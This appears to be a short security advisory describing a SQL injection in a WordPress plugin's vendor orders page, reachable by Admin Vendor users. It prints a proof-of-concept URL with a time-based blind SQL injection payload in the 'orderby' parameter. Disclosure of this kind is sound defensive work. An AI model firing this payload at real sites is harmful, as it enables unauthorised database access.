The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as Admin Vendor and above
As an Admin vendor, open the URL below https://example.com/wp-admin/admin.php?page=wcpv-vendor-orders&orderby;=order_id`,(select+sleep(10)+from+dual+where+database()+like+database())–±